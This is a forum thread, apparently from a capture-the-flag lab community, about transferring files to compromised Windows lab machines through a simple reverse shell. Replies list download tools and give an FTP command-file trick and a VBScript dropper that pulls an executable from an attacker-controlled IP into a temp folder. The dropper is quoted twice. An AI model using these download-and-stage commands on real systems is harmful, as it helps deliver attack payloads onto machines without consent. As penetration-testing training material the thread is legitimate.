copying files to windows

Hi,

I am trying to move machines from my device to Windows target machines (Arctic, Optimum) but I don’t get any response from the reverse shell. I don’t want to use Metasploit/Meterpreter and I get a simple shell. I tried to use powershell to get file from my http server as well as ftp and smb but after powershell.exe or ftp.exe the shell becomes unresponsive. When I echo ps1 content to a file and run it with powershell.exe, the same happens. On my http server I don’t see any file requested.

Is there any other way to transfer files to these machines from Windows shell?

Smbserver.py,certutil,bitsadmin,nc.exe,batch scripts,wget.exe

Type your comment> @DaChef said:

Smbserver.py,certutil,bitsadmin,nc.exe,batch scripts,wget.exe

In addition to all the these things
there is a good blog post covering this part https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md

also check out this recommendation

https://sushant747.gitbooks.io/total-oscp-guide/transfering_files_to_windows.html

This is a vbscript that is used in the OSCP course material

thanks guys for your hints! I figured out that it is best to create a command file (e.g. for FTP: echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME) and execute ftp with it. Also vbs is good or PoSh-less machines like WS2003: echo dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”) > p.vbs
echo dim bStrm: Set bStrm = createobject(“Adodb.Stream”) >> p.vbs
echo xHttp.Open “GET”, “http://10.10.14.31/w.exe”, False >> p.vbs
cho xHttp.Send >> p.vbs
echo[ >> p.vbs
echo with bStrm >> p.vbs
echo .type = 1 >> p.vbs
echo .open >> p.vbs
echo .write xHttp.responseBody >> p.vbs
echo .savetofile “c:\windows\temp\pawel\w.exe”, 2 >> p.vbs
echo end with >> p.vbs

ach, LOLBINs with download capability, like certutil, can help too :slight_smile:

Type your comment> @pawellakomski said:

thanks guys for your hints! I figured out that it is best to create a command file (e.g. for FTP: echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME) and execute ftp with it. Also vbs is good or PoSh-less machines like WS2003: echo dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”) > p.vbs
echo dim bStrm: Set bStrm = createobject(“Adodb.Stream”) >> p.vbs
echo xHttp.Open “GET”, “http://10.10.14.31/w.exe”, False >> p.vbs
cho xHttp.Send >> p.vbs
echo[ >> p.vbs
echo with bStrm >> p.vbs
echo .type = 1 >> p.vbs
echo .open >> p.vbs
echo .write xHttp.responseBody >> p.vbs
echo .savetofile “c:\windows\temp\pawel\w.exe”, 2 >> p.vbs
echo end with >> p.vbs

This is very time consuming and not convenient at all. Use it when every other option isn’t usable!